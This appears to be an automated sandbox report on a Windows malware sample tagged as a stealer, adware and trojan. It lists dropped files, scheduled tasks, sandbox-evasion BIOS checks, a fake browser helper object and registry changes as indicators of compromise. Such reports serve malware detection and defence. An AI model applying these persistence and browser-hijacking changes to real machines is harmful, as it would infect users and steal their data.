002f47bb6e9157769a3ff8aba74cbb9cc764390da8c07f0f5cbc22e8b3d3106f

Analysis

max time kernel
140s
max time network
178s
platform
windows7_x64
resource
win7v20210408
submitted
21-06-2021 07:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5bda03599e20fd2226c14ad3f22a518b.exe
Size

6.2MB
MD5

5bda03599e20fd2226c14ad3f22a518b
SHA1

887f36bc21fa6ba4d59c418405a3b12f3996300b
SHA256

002f47bb6e9157769a3ff8aba74cbb9cc764390da8c07f0f5cbc22e8b3d3106f
SHA512

36ec72bd6732445da58f3c32e376699e3613a5dbeb41bf6f5f70cdb88c2567f1c3b9472bbd8cd8ab7be03992c2b697424c99ed646e96d08c962a1672f2e343bb

Score

10^/10

adware discovery evasion persistence spyware stealer trojan

Malware Config

Signatures

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

8 620 rundll32.exe
Executes dropped EXE 5 IoCs

Processes:

SimplInst.exeSimplInst.exeYlqWVPE.exeoBRwDtw.exeGEVAcGY.exe

pid process

1700 SimplInst.exe
792 SimplInst.exe
1836 YlqWVPE.exe
1848 oBRwDtw.exe
1748 GEVAcGY.exe

flow	pid	process
8	620	rundll32.exe

pid	process
1700	SimplInst.exe
792	SimplInst.exe
1836	YlqWVPE.exe
1848	oBRwDtw.exe
1748	GEVAcGY.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Loads dropped DLL 13 IoCs

Processes:

5bda03599e20fd2226c14ad3f22a518b.exeSimplInst.exeSimplInst.exerundll32.exe

pid	process
816	5bda03599e20fd2226c14ad3f22a518b.exe
1700	SimplInst.exe
1700	SimplInst.exe
1700	SimplInst.exe
1700	SimplInst.exe
1700	SimplInst.exe
792	SimplInst.exe
792	SimplInst.exe
792	SimplInst.exe
620	rundll32.exe
620	rundll32.exe
620	rundll32.exe
620	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176

Drops file in System32 directory 18 IoCs

Processes:

powershell.EXEpowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exerundll32.exepowershell.exeYlqWVPE.exepowershell.exeSimplInst.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	YlqWVPE.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	SimplInst.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	YlqWVPE.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Program Files directory 64 IoCs

Processes:

oBRwDtw.exe

description	ioc	process
File created	C:\Program Files (x86)\WSPNEpLqQIE\tgZBuA7n.dll	oBRwDtw.exe
File opened for modification	C:\Program Files (x86)\WSPNEpLqQIE\files\Kernel.js	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\mk\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\nl\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sq\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pl\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt_BR\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\pQmgloyPupxgC\vxKsvNZ.xml	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\am\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hu\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\lv\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\zh_CN\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\xmNhbyV.exe	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\icon16.ico	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ta\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\te\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ro\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\uk\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\anjFGKdzU\RBAJUXZ.xml	oBRwDtw.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\de\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hr\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fi\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hi\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ko\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt_PT\messages.json	oBRwDtw.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	oBRwDtw.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\be\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sv\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\he\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\ktTXGKPDP.dll	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\th\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\ELOJFuMDhuHU2\jLSVeSLTGAZDI.dll	oBRwDtw.exe
File created	C:\Program Files (x86)\ELOJFuMDhuHU2\zNPmvCU.xml	oBRwDtw.exe
File created	C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\mkzZPad.xml	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\bg\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\it\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ms\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\Z29V4M.dll	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\cs\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\da\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\gu\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ru\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\anjFGKdzU\LVSTAD.dll	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\el\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\es_419\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\zh_TW\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\xMrdhAC.dll	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ca\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ml\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sr\messages.json	oBRwDtw.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ja\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sk\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\no\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\et\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fil\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fr\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fa\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sw\messages.json	oBRwDtw.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\vi\messages.json	oBRwDtw.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bqZkKdgiyjBiVwZYfn.job	schtasks.exe
File created	C:\Windows\Tasks\jrzNdZzegeVMzeqYf.job	schtasks.exe
File created	C:\Windows\Tasks\JRajWlGIFNTafba.job	schtasks.exe
File created	C:\Windows\Tasks\wNQepEmyQbhZnWiRT.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1012	schtasks.exe
288	schtasks.exe
828	schtasks.exe
1040	schtasks.exe
1340	schtasks.exe
1168	schtasks.exe
1976	schtasks.exe
1712	schtasks.exe
900	schtasks.exe
432	schtasks.exe
1732	schtasks.exe
552	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	SimplInst.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies Internet Explorer settings 1 TTPs 19 IoCs

adware spyware

Modify Registry

T1112

Processes:

oBRwDtw.exeGEVAcGY.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	oBRwDtw.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights	oBRwDtw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\WSPNEpLqQIE"	oBRwDtw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	oBRwDtw.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Approved Extensions	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\WSPNEpLqQIE"	oBRwDtw.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	oBRwDtw.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MAIN	oBRwDtw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\xmNhbyV.exe = "9999"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "xmNhbyV.exe"	oBRwDtw.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	oBRwDtw.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	oBRwDtw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "xmNhbyV.exe"	oBRwDtw.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	GEVAcGY.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	oBRwDtw.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	oBRwDtw.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{1A4355C3-1380-4565-8F0B-AE992134C31B} = 51667a6c4c1d3b1bd3495506b2430f0a9006e4d920778100	oBRwDtw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	GEVAcGY.exe

Modifies data under HKEY_USERS 40 IoCs

Processes:

YlqWVPE.exewscript.exerundll32.exepowershell.exeoBRwDtw.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	YlqWVPE.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-42-f0-13-0a-82\WpadDecision = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-42-f0-13-0a-82\WpadDecisionTime = 70e1d3567c66d701	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000070e2dd3c7c66d701	YlqWVPE.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	YlqWVPE.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}\WpadNetworkName = "Network"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	YlqWVPE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	oBRwDtw.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	oBRwDtw.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	oBRwDtw.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}\WpadDecisionReason = "1"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}\WpadDecisionTime = 70e1d3567c66d701	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}\WpadDecision = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-42-f0-13-0a-82	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	YlqWVPE.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a07001d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}\aa-42-f0-13-0a-82	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-42-f0-13-0a-82\WpadDecisionReason = "1"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 70f8033d7c66d701	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe

Modifies registry class 64 IoCs

Processes:

oBRwDtw.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ = "YoutubeAdBlock"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\ = "BackgroundScriptEngine Class"	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\FLAGS	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\tgZBuA7n.dll"	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ = "_YtazTUhZpmGFMeosxGoStrqXzW"	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\Version = "1.0"	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\FLAGS\ = "0"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\Version = "1.0"	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}	oBRwDtw.exe
